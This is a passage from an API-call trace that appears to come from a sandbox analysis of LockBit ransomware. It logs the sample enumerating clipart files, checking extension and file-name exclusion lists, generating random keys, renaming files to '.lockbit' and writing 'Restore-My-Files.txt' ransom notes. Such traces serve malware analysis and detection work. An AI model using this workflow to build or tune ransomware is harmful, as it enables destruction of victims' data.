lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.307] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00705_.WMF") returned 1 [0110.308] lstrcmpiW (lpString1="ntldr", lpString2="DD00705_.WMF") returned 1 [0110.308] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00705_.WMF") returned 1 [0110.308] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00705_.WMF") returned -1 [0110.308] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00705_.WMF") returned -1 [0110.308] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00705_.WMF") returned 1 [0110.308] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00705_.WMF") returned 1 [0110.308] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.308] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned=".WMF" [0110.308] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.308] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.308] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.309] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.309] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.lockbit") returned 72 [0110.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.310] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.310] malloc (_Size=0x40068) returned 0x3ef0008 [0110.310] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=24588) returned 1 [0110.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.312] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.316] malloc (_Size=0xa6) returned 0x77d800 [0110.316] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.319] free (_Block=0x77d800) [0110.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.319] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb92d600, ftCreationTime.dwHighDateTime=0x1bd4b42, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb92d600, ftLastWriteTime.dwHighDateTime=0x1bd4b42, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01015_.WMF", cAlternateFileName="")) returned 1 [0110.319] lstrcmpiW (lpString1=".", lpString2="DD01015_.WMF") returned -1 [0110.319] lstrcmpiW (lpString1="..", lpString2="DD01015_.WMF") returned -1 [0110.319] PathFindExtensionW (pszPath="DD01015_.WMF") returned=".WMF" [0110.319] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.319] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.320] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.320] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01015_.WMF") returned 1 [0110.320] lstrcmpiW (lpString1="ntldr", lpString2="DD01015_.WMF") returned 1 [0110.320] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01015_.WMF") returned 1 [0110.320] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01015_.WMF") returned -1 [0110.320] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01015_.WMF") returned -1 [0110.320] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01015_.WMF") returned 1 [0110.320] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01015_.WMF") returned 1 [0110.320] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.320] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned=".WMF" [0110.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.321] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.321] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.321] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.lockbit") returned 72 [0110.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.322] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.322] malloc (_Size=0x40068) returned 0x3ef0008 [0110.322] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2226) returned 1 [0110.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.324] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0110.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.333] malloc (_Size=0xa6) returned 0x77d800 [0110.333] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.333] free (_Block=0x77d800) [0110.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.333] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x39e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01039_.WMF", cAlternateFileName="")) returned 1 [0110.333] lstrcmpiW (lpString1=".", lpString2="DD01039_.WMF") returned -1 [0110.333] lstrcmpiW (lpString1="..", lpString2="DD01039_.WMF") returned -1 [0110.333] PathFindExtensionW (pszPath="DD01039_.WMF") returned=".WMF" [0110.333] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.333] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.334] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.334] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01039_.WMF") returned 1 [0110.335] lstrcmpiW (lpString1="ntldr", lpString2="DD01039_.WMF") returned 1 [0110.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01039_.WMF") returned 1 [0110.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01039_.WMF") returned -1 [0110.335] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01039_.WMF") returned -1 [0110.335] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01039_.WMF") returned 1 [0110.335] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01039_.WMF") returned 1 [0110.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned=".WMF" [0110.335] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.335] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.335] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.336] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.336] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.336] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.lockbit") returned 72 [0110.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0010000, 